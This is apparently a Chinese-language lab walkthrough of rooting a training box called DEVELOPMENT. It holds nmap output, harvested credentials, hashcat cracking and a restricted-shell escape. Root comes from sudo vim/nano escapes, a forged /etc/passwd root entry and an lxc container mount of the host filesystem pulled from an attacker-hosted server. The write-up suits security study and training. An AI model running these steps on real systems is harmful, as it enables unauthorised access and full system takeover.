信息收集
| IP Address | Opening Ports |
|---|---|
| 192.168.101.149 | TCP:22,113,139,445,8080 |
$ nmap -p- 192.168.101.149 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|_ 256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp open ident?
|_auth-owners: oident
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open http-proxy IIS 6.0
|_http-server-header: IIS 6.0
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 15 Jul 2024 11:38:11 GMT
| Server: IIS 6.0
| Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT
| ETag: "230-57de32091ad69"
| Accept-Ranges: bytes
| Content-Length: 560
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <html>
| <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
| </head>
| <body>
| <p>Welcome to the Development Page.</p>
| <br/>
| <p>There are many projects in this box. View some of these projects at html_pages.</p>
| <br/>
| <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.</p>
| <br/>
| <br/>
| <br/>
| <hr>
| <i>Powered by IIS 6.0</i>
| </body>
| <!-- Searching for development secret page... where could it be? -->
| <!-- Patrick, Head of Development-->
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 15 Jul 2024 11:38:11 GMT
| Server: IIS 6.0
| Allow: GET,POST,OPTIONS,HEAD
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Mon, 15 Jul 2024 11:38:11 GMT
| Server: IIS 6.0
| Content-Length: 294
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>IIS 6.0 Server at 192.168.101.149 Port 8080</address>
|_ </body></html>
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=7/15%Time=66950A23%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,330,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2015\x20Jul\x202
SF:024\x2011:38:11\x20GMT\r\nServer:\x20IIS\x206\.0\r\nLast-Modified:\x20W
SF:ed,\x2026\x20Dec\x202018\x2001:55:41\x20GMT\r\nETag:\x20\"230-57de32091
SF:ad69\"\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x20560\r\nVary:\x2
SF:0Accept-Encoding\r\nConnection:\x20close\r\nContent-Type:\x20text/html\
SF:r\n\r\n<html>\r\n<head><title>DEVELOPMENT\x20PORTAL\.\x20NOT\x20FOR\x20
SF:OUTSIDERS\x20OR\x20HACKERS!</title>\r\n</head>\r\n<body>\r\n<p>Welcome\
SF:x20to\x20the\x20Development\x20Page\.</p>\r\n<br/>\r\n<p>There\x20are\x
SF:20many\x20projects\x20in\x20this\x20box\.\x20View\x20some\x20of\x20thes
SF:e\x20projects\x20at\x20html_pages\.</p>\r\n<br/>\r\n<p>WARNING!\x20We\x
SF:20are\x20experimenting\x20a\x20host-based\x20intrusion\x20detection\x20
SF:system\.\x20Report\x20all\x20false\x20positives\x20to\x20patrick@goodte
SF:ch\.com\.sg\.</p>\r\n<br/>\r\n<br/>\r\n<br/>\r\n<hr>\r\n<i>Powered\x20b
SF:y\x20IIS\x206\.0</i>\r\n</body>\r\n\r\n<!--\x20Searching\x20for\x20deve
SF:lopment\x20secret\x20page\.\.\.\x20where\x20could\x20it\x20be\?\x20-->\
SF:r\n\r\n<!--\x20Patrick,\x20Head\x20of\x20Development-->\r\n\r\n</html>\
SF:r\n")%r(HTTPOptions,A6,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2015\x
SF:20Jul\x202024\x2011:38:11\x20GMT\r\nServer:\x20IIS\x206\.0\r\nAllow:\x2
SF:0GET,POST,OPTIONS,HEAD\r\nContent-Length:\x200\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html\r\n\r\n")%r(RTSPRequest,1CD,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nDate:\x20Mon,\x2015\x20Jul\x202024\x2011:38:1
SF:1\x20GMT\r\nServer:\x20IIS\x206\.0\r\nContent-Length:\x20294\r\nConnect
SF:ion:\x20close\r\nContent-Type:\x20text/html;\x20charset=iso-8859-1\r\n\
SF:r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//EN\">
SF:\n<html><head>\n<title>400\x20Bad\x20Request</title>\n</head><body>\n<h
SF:1>Bad\x20Request</h1>\n<p>Your\x20browser\x20sent\x20a\x20request\x20th
SF:at\x20this\x20server\x20could\x20not\x20understand\.<br\x20/>\n</p>\n<h
SF:r>\n<address>IIS\x206\.0\x20Server\x20at\x20192\.168\.101\.149\x20Port\
SF:x208080</address>\n</body></html>\n");
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-07-15T11:39:41
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: development
| NetBIOS computer name: DEVELOPMENT\x00
| Domain name: \x00
| FQDN: development
|_ System time: 2024-07-15T11:39:41+00:00
枚举
http://192.168.101.149:8080/
http://192.168.101.149:8080/html_pages
http://192.168.101.149:8080/development.html
http://192.168.101.149:8080/developmentsecretpage/patrick.php?logout=1
username:admin
password:1234
Exploit-db 上发现了一个名为/[path]/slog_users.txt的漏洞,该漏洞容易受到 RFI 的影响。请参阅 CVE 代码:2008-5762/63。
http://192.168.101.149:8080/developmentsecretpage/slog_users.txt
$ hashcat -m 0 -a 0 '4a8a2b374f463b7aedbb44a066363b81' /usr/share/wordlists/rockyou.txt
username:intern
password:12345678900987654321
username:patrick
password:P@ssw0rd25
username:qiu
password:qiu
本地权限
$ ssh intern@192.168.101.149
$ echo os.system("/bin/bash")
Local.txt 截屏
Local.txt 内容
Congratulations on obtaining a user shell. 😃
权限提升
vim 提权
intern@development:~$ cat work.txt
intern@development:/tmp$ su patrick
patrick@development:~$ sudo /usr/bin/vim
:set shell=/bin/bash
:shell
nano 提权
patrick@development:~$ sudo nano
patrick@development:~$ ^R^X
patrick@development:~$ reset; sh 1>&0 2>&0
/etc/passwd 提权
patrick@development:~$ openssl passwd -1 -salt maptnh opopop
1 1 1maptnh$ItUNUP3HGbsfXKvpOJ58V.
maptnh:$1$maptnh$ItUNUP3HGbsfXKvpOJ58V.:0:0:root:/root:/bin/bash
patrick@development:~$ sudo vim /etc/passwd
patrick@development:~$ su maptnh
lxc 提权
(kali)$ git clone https://github.com/saghul/lxd-alpine-builder.git
(kali)$ cd lxd-alpine-builder
构建包
(kali)$ sudo ./build-alpine
(kali)$ python3 -m http.server 10035
patrick@development:/tmp$wget http://192.168.101.128/alpine-v3.20-x86_64-20240712_0618.tar.gz
patrick@development:/tmp$ lxc image import /tmp/alpine-v3.20-x86_64-20240712_0618.tar.gz --alias test
patrick@development:/tmp$ lxc image list
patrick@development:/tmp$ lxc init test ignite -c security.privileged=true -s default
patrick@development:/tmp$ lxc config device add ignite test disk source=/ path=/mnt/root recursive=true
patrick@development:/tmp$ lxc start ignite
patrick@development:/tmp$ lxc exec ignite /bin/sh
Proof.txt 截屏
Proof.txt 内容
Congratulations on rooting DEVELOPMENT! 😃
